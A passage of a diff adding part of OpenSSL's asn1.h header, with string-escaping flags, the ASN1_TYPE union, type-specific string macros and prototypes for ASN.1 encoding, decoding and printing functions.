+# define ASN1_STRFLGS_ESC_MSB            4
+
+/*
+ * This flag determines how we do escaping: normally RC2253 backslash only,
+ * set this to use backslash and quote.
+ */
+
+# define ASN1_STRFLGS_ESC_QUOTE          8
+
+/* These three flags are internal use only. */
+
+/* Character is a valid PrintableString character */
+# define CHARTYPE_PRINTABLESTRING        0x10
+/* Character needs escaping if it is the first character */
+# define CHARTYPE_FIRST_ESC_2253         0x20
+/* Character needs escaping if it is the last character */
+# define CHARTYPE_LAST_ESC_2253          0x40
+
+/*
+ * NB the internal flags are safely reused below by flags handled at the top
+ * level.
+ */
+
+/*
+ * If this is set we convert all character strings to UTF8 first
+ */
+
+# define ASN1_STRFLGS_UTF8_CONVERT       0x10
+
+/*
+ * If this is set we don't attempt to interpret content: just assume all
+ * strings are 1 byte per character. This will produce some pretty odd
+ * looking output!
+ */
+
+# define ASN1_STRFLGS_IGNORE_TYPE        0x20
+
+/* If this is set we include the string type in the output */
+# define ASN1_STRFLGS_SHOW_TYPE          0x40
+
+/*
+ * This determines which strings to display and which to 'dump' (hex dump of
+ * content octets or DER encoding). We can only dump non character strings or
+ * everything. If we don't dump 'unknown' they are interpreted as character
+ * strings with 1 octet per character and are subject to the usual escaping
+ * options.
+ */
+
+# define ASN1_STRFLGS_DUMP_ALL           0x80
+# define ASN1_STRFLGS_DUMP_UNKNOWN       0x100
+
+/*
+ * These determine what 'dumping' does, we can dump the content octets or the
+ * DER encoding: both use the RFC2253 #XXXXX notation.
+ */
+
+# define ASN1_STRFLGS_DUMP_DER           0x200
+
+/*
+ * All the string flags consistent with RFC2253, escaping control characters
+ * isn't essential in RFC2253 but it is advisable anyway.
+ */
+
+# define ASN1_STRFLGS_RFC2253    (ASN1_STRFLGS_ESC_2253 | \
+                                ASN1_STRFLGS_ESC_CTRL | \
+                                ASN1_STRFLGS_ESC_MSB | \
+                                ASN1_STRFLGS_UTF8_CONVERT | \
+                                ASN1_STRFLGS_DUMP_UNKNOWN | \
+                                ASN1_STRFLGS_DUMP_DER)
+
+DECLARE_STACK_OF(ASN1_INTEGER)
+DECLARE_ASN1_SET_OF(ASN1_INTEGER)
+
+DECLARE_STACK_OF(ASN1_GENERALSTRING)
+
+typedef struct asn1_type_st {
+    int type;
+    union {
+        char *ptr;
+        ASN1_BOOLEAN boolean;
+        ASN1_STRING *asn1_string;
+        ASN1_OBJECT *object;
+        ASN1_INTEGER *integer;
+        ASN1_ENUMERATED *enumerated;
+        ASN1_BIT_STRING *bit_string;
+        ASN1_OCTET_STRING *octet_string;
+        ASN1_PRINTABLESTRING *printablestring;
+        ASN1_T61STRING *t61string;
+        ASN1_IA5STRING *ia5string;
+        ASN1_GENERALSTRING *generalstring;
+        ASN1_BMPSTRING *bmpstring;
+        ASN1_UNIVERSALSTRING *universalstring;
+        ASN1_UTCTIME *utctime;
+        ASN1_GENERALIZEDTIME *generalizedtime;
+        ASN1_VISIBLESTRING *visiblestring;
+        ASN1_UTF8STRING *utf8string;
+        /*
+         * set and sequence are left complete and still contain the set or
+         * sequence bytes
+         */
+        ASN1_STRING *set;
+        ASN1_STRING *sequence;
+        ASN1_VALUE *asn1_value;
+    } value;
+} ASN1_TYPE;
+
+DECLARE_STACK_OF(ASN1_TYPE)
+DECLARE_ASN1_SET_OF(ASN1_TYPE)
+
+typedef STACK_OF(ASN1_TYPE) ASN1_SEQUENCE_ANY;
+
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(ASN1_SEQUENCE_ANY, ASN1_SEQUENCE_ANY)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(ASN1_SEQUENCE_ANY, ASN1_SET_ANY)
+
+typedef struct NETSCAPE_X509_st {
+    ASN1_OCTET_STRING *header;
+    X509 *cert;
+} NETSCAPE_X509;
+
+/* This is used to contain a list of bit names */
+typedef struct BIT_STRING_BITNAME_st {
+    int bitnum;
+    const char *lname;
+    const char *sname;
+} BIT_STRING_BITNAME;
+
+# define M_ASN1_STRING_length(x) ((x)->length)
+# define M_ASN1_STRING_length_set(x, n)  ((x)->length = (n))
+# define M_ASN1_STRING_type(x)   ((x)->type)
+# define M_ASN1_STRING_data(x)   ((x)->data)
+
+/* Macros for string operations */
+# define M_ASN1_BIT_STRING_new() (ASN1_BIT_STRING *)\
+                ASN1_STRING_type_new(V_ASN1_BIT_STRING)
+# define M_ASN1_BIT_STRING_free(a)       ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_BIT_STRING_dup(a) (ASN1_BIT_STRING *)\
+                ASN1_STRING_dup((const ASN1_STRING *)a)
+# define M_ASN1_BIT_STRING_cmp(a,b) ASN1_STRING_cmp(\
+                (const ASN1_STRING *)a,(const ASN1_STRING *)b)
+# define M_ASN1_BIT_STRING_set(a,b,c) ASN1_STRING_set((ASN1_STRING *)a,b,c)
+
+# define M_ASN1_INTEGER_new()    (ASN1_INTEGER *)\
+                ASN1_STRING_type_new(V_ASN1_INTEGER)
+# define M_ASN1_INTEGER_free(a)          ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_INTEGER_dup(a) (ASN1_INTEGER *)\
+                ASN1_STRING_dup((const ASN1_STRING *)a)
+# define M_ASN1_INTEGER_cmp(a,b) ASN1_STRING_cmp(\
+                (const ASN1_STRING *)a,(const ASN1_STRING *)b)
+
+# define M_ASN1_ENUMERATED_new() (ASN1_ENUMERATED *)\
+                ASN1_STRING_type_new(V_ASN1_ENUMERATED)
+# define M_ASN1_ENUMERATED_free(a)       ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_ENUMERATED_dup(a) (ASN1_ENUMERATED *)\
+                ASN1_STRING_dup((const ASN1_STRING *)a)
+# define M_ASN1_ENUMERATED_cmp(a,b)      ASN1_STRING_cmp(\
+                (const ASN1_STRING *)a,(const ASN1_STRING *)b)
+
+# define M_ASN1_OCTET_STRING_new()       (ASN1_OCTET_STRING *)\
+                ASN1_STRING_type_new(V_ASN1_OCTET_STRING)
+# define M_ASN1_OCTET_STRING_free(a)     ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_OCTET_STRING_dup(a) (ASN1_OCTET_STRING *)\
+                ASN1_STRING_dup((const ASN1_STRING *)a)
+# define M_ASN1_OCTET_STRING_cmp(a,b) ASN1_STRING_cmp(\
+                (const ASN1_STRING *)a,(const ASN1_STRING *)b)
+# define M_ASN1_OCTET_STRING_set(a,b,c)  ASN1_STRING_set((ASN1_STRING *)a,b,c)
+# define M_ASN1_OCTET_STRING_print(a,b)  ASN1_STRING_print(a,(ASN1_STRING *)b)
+# define M_i2d_ASN1_OCTET_STRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_OCTET_STRING,\
+                V_ASN1_UNIVERSAL)
+
+# define B_ASN1_TIME \
+                        B_ASN1_UTCTIME | \
+                        B_ASN1_GENERALIZEDTIME
+
+# define B_ASN1_PRINTABLE \
+                        B_ASN1_NUMERICSTRING| \
+                        B_ASN1_PRINTABLESTRING| \
+                        B_ASN1_T61STRING| \
+                        B_ASN1_IA5STRING| \
+                        B_ASN1_BIT_STRING| \
+                        B_ASN1_UNIVERSALSTRING|\
+                        B_ASN1_BMPSTRING|\
+                        B_ASN1_UTF8STRING|\
+                        B_ASN1_SEQUENCE|\
+                        B_ASN1_UNKNOWN
+
+# define B_ASN1_DIRECTORYSTRING \
+                        B_ASN1_PRINTABLESTRING| \
+                        B_ASN1_TELETEXSTRING|\
+                        B_ASN1_BMPSTRING|\
+                        B_ASN1_UNIVERSALSTRING|\
+                        B_ASN1_UTF8STRING
+
+# define B_ASN1_DISPLAYTEXT \
+                        B_ASN1_IA5STRING| \
+                        B_ASN1_VISIBLESTRING| \
+                        B_ASN1_BMPSTRING|\
+                        B_ASN1_UTF8STRING
+
+# define M_ASN1_PRINTABLE_new()  ASN1_STRING_type_new(V_ASN1_T61STRING)
+# define M_ASN1_PRINTABLE_free(a)        ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_PRINTABLE(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
+                pp,a->type,V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_PRINTABLE(a,pp,l) \
+                d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
+                        B_ASN1_PRINTABLE)
+
+# define M_DIRECTORYSTRING_new() ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
+# define M_DIRECTORYSTRING_free(a)       ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_DIRECTORYSTRING(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
+                                                pp,a->type,V_ASN1_UNIVERSAL)
+# define M_d2i_DIRECTORYSTRING(a,pp,l) \
+                d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
+                        B_ASN1_DIRECTORYSTRING)
+
+# define M_DISPLAYTEXT_new() ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
+# define M_DISPLAYTEXT_free(a) ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_DISPLAYTEXT(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
+                                                pp,a->type,V_ASN1_UNIVERSAL)
+# define M_d2i_DISPLAYTEXT(a,pp,l) \
+                d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
+                        B_ASN1_DISPLAYTEXT)
+
+# define M_ASN1_PRINTABLESTRING_new() (ASN1_PRINTABLESTRING *)\
+                ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
+# define M_ASN1_PRINTABLESTRING_free(a)  ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_PRINTABLESTRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_PRINTABLESTRING,\
+                V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_PRINTABLESTRING(a,pp,l) \
+                (ASN1_PRINTABLESTRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_PRINTABLESTRING)
+
+# define M_ASN1_T61STRING_new()  (ASN1_T61STRING *)\
+                ASN1_STRING_type_new(V_ASN1_T61STRING)
+# define M_ASN1_T61STRING_free(a)        ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_T61STRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_T61STRING,\
+                V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_T61STRING(a,pp,l) \
+                (ASN1_T61STRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_T61STRING)
+
+# define M_ASN1_IA5STRING_new()  (ASN1_IA5STRING *)\
+                ASN1_STRING_type_new(V_ASN1_IA5STRING)
+# define M_ASN1_IA5STRING_free(a)        ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_IA5STRING_dup(a) \
+                (ASN1_IA5STRING *)ASN1_STRING_dup((const ASN1_STRING *)a)
+# define M_i2d_ASN1_IA5STRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_IA5STRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_IA5STRING(a,pp,l) \
+                (ASN1_IA5STRING *)d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l,\
+                        B_ASN1_IA5STRING)
+
+# define M_ASN1_UTCTIME_new()    (ASN1_UTCTIME *)\
+                ASN1_STRING_type_new(V_ASN1_UTCTIME)
+# define M_ASN1_UTCTIME_free(a)  ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_UTCTIME_dup(a) (ASN1_UTCTIME *)\
+                ASN1_STRING_dup((const ASN1_STRING *)a)
+
+# define M_ASN1_GENERALIZEDTIME_new()    (ASN1_GENERALIZEDTIME *)\
+                ASN1_STRING_type_new(V_ASN1_GENERALIZEDTIME)
+# define M_ASN1_GENERALIZEDTIME_free(a)  ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_GENERALIZEDTIME_dup(a) (ASN1_GENERALIZEDTIME *)ASN1_STRING_dup(\
+        (const ASN1_STRING *)a)
+
+# define M_ASN1_TIME_new()       (ASN1_TIME *)\
+                ASN1_STRING_type_new(V_ASN1_UTCTIME)
+# define M_ASN1_TIME_free(a)     ASN1_STRING_free((ASN1_STRING *)a)
+# define M_ASN1_TIME_dup(a) (ASN1_TIME *)\
+        ASN1_STRING_dup((const ASN1_STRING *)a)
+
+# define M_ASN1_GENERALSTRING_new()      (ASN1_GENERALSTRING *)\
+                ASN1_STRING_type_new(V_ASN1_GENERALSTRING)
+# define M_ASN1_GENERALSTRING_free(a)    ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_GENERALSTRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_GENERALSTRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_GENERALSTRING(a,pp,l) \
+                (ASN1_GENERALSTRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_GENERALSTRING)
+
+# define M_ASN1_UNIVERSALSTRING_new()    (ASN1_UNIVERSALSTRING *)\
+                ASN1_STRING_type_new(V_ASN1_UNIVERSALSTRING)
+# define M_ASN1_UNIVERSALSTRING_free(a)  ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_UNIVERSALSTRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UNIVERSALSTRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_UNIVERSALSTRING(a,pp,l) \
+                (ASN1_UNIVERSALSTRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_UNIVERSALSTRING)
+
+# define M_ASN1_BMPSTRING_new()  (ASN1_BMPSTRING *)\
+                ASN1_STRING_type_new(V_ASN1_BMPSTRING)
+# define M_ASN1_BMPSTRING_free(a)        ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_BMPSTRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_BMPSTRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_BMPSTRING(a,pp,l) \
+                (ASN1_BMPSTRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_BMPSTRING)
+
+# define M_ASN1_VISIBLESTRING_new()      (ASN1_VISIBLESTRING *)\
+                ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
+# define M_ASN1_VISIBLESTRING_free(a)    ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_VISIBLESTRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_VISIBLESTRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_VISIBLESTRING(a,pp,l) \
+                (ASN1_VISIBLESTRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_VISIBLESTRING)
+
+# define M_ASN1_UTF8STRING_new() (ASN1_UTF8STRING *)\
+                ASN1_STRING_type_new(V_ASN1_UTF8STRING)
+# define M_ASN1_UTF8STRING_free(a)       ASN1_STRING_free((ASN1_STRING *)a)
+# define M_i2d_ASN1_UTF8STRING(a,pp) \
+                i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UTF8STRING,\
+                        V_ASN1_UNIVERSAL)
+# define M_d2i_ASN1_UTF8STRING(a,pp,l) \
+                (ASN1_UTF8STRING *)d2i_ASN1_type_bytes\
+                ((ASN1_STRING **)a,pp,l,B_ASN1_UTF8STRING)
+
+  /* for the is_set parameter to i2d_ASN1_SET */
+# define IS_SEQUENCE     0
+# define IS_SET          1
+
+DECLARE_ASN1_FUNCTIONS_fname(ASN1_TYPE, ASN1_ANY, ASN1_TYPE)
+
+int ASN1_TYPE_get(ASN1_TYPE *a);
+void ASN1_TYPE_set(ASN1_TYPE *a, int type, void *value);
+int ASN1_TYPE_set1(ASN1_TYPE *a, int type, const void *value);
+int ASN1_TYPE_cmp(const ASN1_TYPE *a, const ASN1_TYPE *b);
+
+ASN1_OBJECT *ASN1_OBJECT_new(void);
+void ASN1_OBJECT_free(ASN1_OBJECT *a);
+int i2d_ASN1_OBJECT(ASN1_OBJECT *a, unsigned char **pp);
+ASN1_OBJECT *c2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
+                             long length);
+ASN1_OBJECT *d2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
+                             long length);
+
+DECLARE_ASN1_ITEM(ASN1_OBJECT)
+
+DECLARE_STACK_OF(ASN1_OBJECT)
+DECLARE_ASN1_SET_OF(ASN1_OBJECT)
+
+ASN1_STRING *ASN1_STRING_new(void);
+void ASN1_STRING_free(ASN1_STRING *a);
+int ASN1_STRING_copy(ASN1_STRING *dst, const ASN1_STRING *str);
+ASN1_STRING *ASN1_STRING_dup(const ASN1_STRING *a);
+ASN1_STRING *ASN1_STRING_type_new(int type);
+int ASN1_STRING_cmp(const ASN1_STRING *a, const ASN1_STRING *b);
+  /*
+   * Since this is used to store all sorts of things, via macros, for now,
+   * make its data void *
+   */
+int ASN1_STRING_set(ASN1_STRING *str, const void *data, int len);
+void ASN1_STRING_set0(ASN1_STRING *str, void *data, int len);
+int ASN1_STRING_length(const ASN1_STRING *x);
+void ASN1_STRING_length_set(ASN1_STRING *x, int n);
+int ASN1_STRING_type(ASN1_STRING *x);
+unsigned char *ASN1_STRING_data(ASN1_STRING *x);
+
+DECLARE_ASN1_FUNCTIONS(ASN1_BIT_STRING)
+int i2c_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **pp);
+ASN1_BIT_STRING *c2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a,
+                                     const unsigned char **pp, long length);
+int ASN1_BIT_STRING_set(ASN1_BIT_STRING *a, unsigned char *d, int length);
+int ASN1_BIT_STRING_set_bit(ASN1_BIT_STRING *a, int n, int value);
+int ASN1_BIT_STRING_get_bit(ASN1_BIT_STRING *a, int n);
+int ASN1_BIT_STRING_check(ASN1_BIT_STRING *a,
+                          unsigned char *flags, int flags_len);
+
+# ifndef OPENSSL_NO_BIO
+int ASN1_BIT_STRING_name_print(BIO *out, ASN1_BIT_STRING *bs,
+                               BIT_STRING_BITNAME *tbl, int indent);
+# endif
+int ASN1_BIT_STRING_num_asc(char *name, BIT_STRING_BITNAME *tbl);
+int ASN1_BIT_STRING_set_asc(ASN1_BIT_STRING *bs, char *name, int value,
+                            BIT_STRING_BITNAME *tbl);
+
+int i2d_ASN1_BOOLEAN(int a, unsigned char **pp);
+int d2i_ASN1_BOOLEAN(int *a, const unsigned char **pp, long length);
+
+DECLARE_ASN1_FUNCTIONS(ASN1_INTEGER)
+int i2c_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **pp);
+ASN1_INTEGER *c2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **pp,
+                               long length);
+ASN1_INTEGER *d2i_ASN1_UINTEGER(ASN1_INTEGER **a, const unsigned char **pp,
+                                long length);
+ASN1_INTEGER *ASN1_INTEGER_dup(const ASN1_INTEGER *x);
+int ASN1_INTEGER_cmp(const ASN1_INTEGER *x, const ASN1_INTEGER *y);
+
+DECLARE_ASN1_FUNCTIONS(ASN1_ENUMERATED)
+
+int ASN1_UTCTIME_check(const ASN1_UTCTIME *a);
+ASN1_UTCTIME *ASN1_UTCTIME_set(ASN1_UTCTIME *s, time_t t);
+ASN1_UTCTIME *ASN1_UTCTIME_adj(ASN1_UTCTIME *s, time_t t,
+                               int offset_day, long offset_sec);
+int ASN1_UTCTIME_set_string(ASN1_UTCTIME *s, const char *str);
+int ASN1_UTCTIME_cmp_time_t(const ASN1_UTCTIME *s, time_t t);
+# if 0
+time_t ASN1_UTCTIME_get(const ASN1_UTCTIME *s);
+# endif
+
+int ASN1_GENERALIZEDTIME_check(const ASN1_GENERALIZEDTIME *a);
+ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_set(ASN1_GENERALIZEDTIME *s,
+                                               time_t t);
+ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_adj(ASN1_GENERALIZEDTIME *s,
+                                               time_t t, int offset_day,
+                                               long offset_sec);
+int ASN1_GENERALIZEDTIME_set_string(ASN1_GENERALIZEDTIME *s, const char *str);
+int ASN1_TIME_diff(int *pday, int *psec,
+                   const ASN1_TIME *from, const ASN1_TIME *to);
+
+DECLARE_ASN1_FUNCTIONS(ASN1_OCTET_STRING)
+ASN1_OCTET_STRING *ASN1_OCTET_STRING_dup(const ASN1_OCTET_STRING *a);
+int ASN1_OCTET_STRING_cmp(const ASN1_OCTET_STRING *a,
+                          const ASN1_OCTET_STRING *b);
+int ASN1_OCTET_STRING_set(ASN1_OCTET_STRING *str, const unsigned char *data,
+                          int len);
+
+DECLARE_ASN1_FUNCTIONS(ASN1_VISIBLESTRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_UNIVERSALSTRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_UTF8STRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_NULL)
+DECLARE_ASN1_FUNCTIONS(ASN1_BMPSTRING)
+
+int UTF8_getc(const unsigned char *str, int len, unsigned long *val);
+int UTF8_putc(unsigned char *str, int len, unsigned long value);
+
+DECLARE_ASN1_FUNCTIONS_name(ASN1_STRING, ASN1_PRINTABLE)
+
+DECLARE_ASN1_FUNCTIONS_name(ASN1_STRING, DIRECTORYSTRING)
+DECLARE_ASN1_FUNCTIONS_name(ASN1_STRING, DISPLAYTEXT)
+DECLARE_ASN1_FUNCTIONS(ASN1_PRINTABLESTRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_T61STRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_IA5STRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_GENERALSTRING)
+DECLARE_ASN1_FUNCTIONS(ASN1_UTCTIME)
+DECLARE_ASN1_FUNCTIONS(ASN1_GENERALIZEDTIME)
+DECLARE_ASN1_FUNCTIONS(ASN1_TIME)
+
+DECLARE_ASN1_ITEM(ASN1_OCTET_STRING_NDEF)
+
+ASN1_TIME *ASN1_TIME_set(ASN1_TIME *s, time_t t);
+ASN1_TIME *ASN1_TIME_adj(ASN1_TIME *s, time_t t,
+                         int offset_day, long offset_sec);
+int ASN1_TIME_check(ASN1_TIME *t);
+ASN1_GENERALIZEDTIME *ASN1_TIME_to_generalizedtime(ASN1_TIME *t, ASN1_GENERALIZEDTIME
+                                                   **out);
+int ASN1_TIME_set_string(ASN1_TIME *s, const char *str);
+
+int i2d_ASN1_SET(STACK_OF(OPENSSL_BLOCK) *a, unsigned char **pp,
+                 i2d_of_void *i2d, int ex_tag, int ex_class, int is_set);
+STACK_OF(OPENSSL_BLOCK) *d2i_ASN1_SET(STACK_OF(OPENSSL_BLOCK) **a,
+                                      const unsigned char **pp,
+                                      long length, d2i_of_void *d2i,
+                                      void (*free_func) (OPENSSL_BLOCK),
+                                      int ex_tag, int ex_class);
+
+# ifndef OPENSSL_NO_BIO
+int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a);
+int a2i_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *bs, char *buf, int size);
+int i2a_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *a);
+int a2i_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *bs, char *buf, int size);
+int i2a_ASN1_OBJECT(BIO *bp, ASN1_OBJECT *a);
+int a2i_ASN1_STRING(BIO *bp, ASN1_STRING *bs, char *buf, int size);
+int i2a_ASN1_STRING(BIO *bp, ASN1_STRING *a, int type);
+# endif
+int i2t_ASN1_OBJECT(char *buf, int buf_len, ASN1_OBJECT *a);
+
+int a2d_ASN1_OBJECT(unsigned char *out, int olen, const char *buf, int num);
+ASN1_OBJECT *ASN1_OBJECT_create(int nid, unsigned char *data, int len,
+                                const char *sn, const char *ln);
+
+int ASN1_INTEGER_set(ASN1_INTEGER *a, long v);
+long ASN1_INTEGER_get(const ASN1_INTEGER *a);
+ASN1_INTEGER *BN_to_ASN1_INTEGER(const BIGNUM *bn, ASN1_INTEGER *ai);
+BIGNUM *ASN1_INTEGER_to_BN(const ASN1_INTEGER *ai, BIGNUM *bn);
+
+int ASN1_ENUMERATED_set(ASN1_ENUMERATED *a, long v);
+long ASN1_ENUMERATED_get(ASN1_ENUMERATED *a);
+ASN1_ENUMERATED *BN_to_ASN1_ENUMERATED(BIGNUM *bn, ASN1_ENUMERATED *ai);
+BIGNUM *ASN1_ENUMERATED_to_BN(ASN1_ENUMERATED *ai, BIGNUM *bn);
+
+/* General */
+/* given a string, return the correct type, max is the maximum length */
+int ASN1_PRINTABLE_type(const unsigned char *s, int max);
+
+int i2d_ASN1_bytes(ASN1_STRING *a, unsigned char **pp, int tag, int xclass);
+ASN1_STRING *d2i_ASN1_bytes(ASN1_STRING **a, const unsigned char **pp,
+                            long length, int Ptag, int Pclass);
+unsigned long ASN1_tag2bit(int tag);
+/* type is one or more of the B_ASN1_ values. */
+ASN1_STRING *d2i_ASN1_type_bytes(ASN1_STRING **a, const unsigned char **pp,
+                                 long length, int type);
+
+/* PARSING */
+int asn1_Finish(ASN1_CTX *c);
+int asn1_const_Finish(ASN1_const_CTX *c);
+
+/* SPECIALS */
+int ASN1_get_object(const unsigned char **pp, long *plength, int *ptag,
+                    int *pclass, long omax);
+int ASN1_check_infinite_end(unsigned char **p, long len);
+int ASN1_const_check_infinite_end(const unsigned char **p, long len);
+void ASN1_put_object(unsigned char **pp, int constructed, int length,
+                     int tag, int xclass);
+int ASN1_put_eoc(unsigned char **pp);
+int ASN1_object_size(int constructed, int length, int tag);
+
+/* Used to implement other functions */
+void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x);
+
+# define ASN1_dup_of(type,i2d,d2i,x) \
+    ((type*)ASN1_dup(CHECKED_I2D_OF(type, i2d), \
+                     CHECKED_D2I_OF(type, d2i), \
+                     CHECKED_PTR_OF(type, x)))
+
+# define ASN1_dup_of_const(type,i2d,d2i,x) \
+    ((type*)ASN1_dup(CHECKED_I2D_OF(const type, i2d), \
+                     CHECKED_D2I_OF(type, d2i), \
+                     CHECKED_PTR_OF(const type, x)))
+
+void *ASN1_item_dup(const ASN1_ITEM *it, void *x);
+
+/* ASN1 alloc/free macros for when a type is only used internally */
+
+# define M_ASN1_new_of(type) (type *)ASN1_item_new(ASN1_ITEM_rptr(type))
+# define M_ASN1_free_of(x, type) \
+                ASN1_item_free(CHECKED_PTR_OF(type, x), ASN1_ITEM_rptr(type))
+
+# ifndef OPENSSL_NO_FP_API
+void *ASN1_d2i_fp(void *(*xnew) (void), d2i_of_void *d2i, FILE *in, void **x);
+
+#  define ASN1_d2i_fp_of(type,xnew,d2i,in,x) \
+    ((type*)ASN1_d2i_fp(CHECKED_NEW_OF(type, xnew), \
+                        CHECKED_D2I_OF(type, d2i), \
+                        in, \
+                        CHECKED_PPTR_OF(type, x)))
+
+void *ASN1_item_d2i_fp(const ASN1_ITEM *it, FILE *in, void *x);
+int ASN1_i2d_fp(i2d_of_void *i2d, FILE *out, void *x);
+
+#  define ASN1_i2d_fp_of(type,i2d,out,x) \
+    (ASN1_i2d_fp(CHECKED_I2D_OF(type, i2d), \
+                 out, \
+                 CHECKED_PTR_OF(type, x)))
+
+#  define ASN1_i2d_fp_of_const(type,i2d,out,x) \
+    (ASN1_i2d_fp(CHECKED_I2D_OF(const type, i2d), \
+                 out, \
+                 CHECKED_PTR_OF(const type, x)))
+
+int ASN1_item_i2d_fp(const ASN1_ITEM *it, FILE *out, void *x);
+int ASN1_STRING_print_ex_fp(FILE *fp, ASN1_STRING *str, unsigned long flags);
+# endif
+
+int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in);
+
+# ifndef OPENSSL_NO_BIO
+void *ASN1_d2i_bio(void *(*xnew) (void), d2i_of_void *d2i, BIO *in, void **x);
+
+#  define ASN1_d2i_bio_of(type,xnew,d2i,in,x) \
+    ((type*)ASN1_d2i_bio( CHECKED_NEW_OF(type, xnew), \
+                          CHECKED_D2I_OF(type, d2i), \
+                          in, \
+                          CHECKED_PPTR_OF(type, x)))
+
+void *ASN1_item_d2i_bio(const ASN1_ITEM *it, BIO *in, void *x);
+int ASN1_i2d_bio(i2d_of_void *i2d, BIO *out, unsigned char *x);
+
+#  define ASN1_i2d_bio_of(type,i2d,out,x) \
+    (ASN1_i2d_bio(CHECKED_I2D_OF(type, i2d), \
+                  out, \
+                  CHECKED_PTR_OF(type, x)))
+
+#  define ASN1_i2d_bio_of_const(type,i2d,out,x) \
+    (ASN1_i2d_bio(CHECKED_I2D_OF(const type, i2d), \
+                  out, \
+                  CHECKED_PTR_OF(const type, x)))
+
+int ASN1_item_i2d_bio(const ASN1_ITEM *it, BIO *out, void *x);
+int ASN1_UTCTIME_print(BIO *fp, const ASN1_UTCTIME *a);
+int ASN1_GENERALIZEDTIME_print(BIO *fp, const ASN1_GENERALIZEDTIME *a);
+int ASN1_TIME_print(BIO *fp, const ASN1_TIME *a);
+int ASN1_STRING_print(BIO *bp, const ASN1_STRING *v);
+int ASN1_STRING_print_ex(BIO *out, ASN1_STRING *str, unsigned long flags);
+int ASN1_bn_print(BIO *bp, const char *number, const BIGNUM *num,
+                  unsigned char *buf, int off);
+int ASN1_parse(BIO *bp, const unsigned char *pp, long len, int indent);
+int ASN1_parse_dump(BIO *bp, const unsigned char *pp, long len, int indent,
+                    int dump);
+# endif
+const char *ASN1_tag2str(int tag);
+
+/* Used to load and write netscape format cert */
+
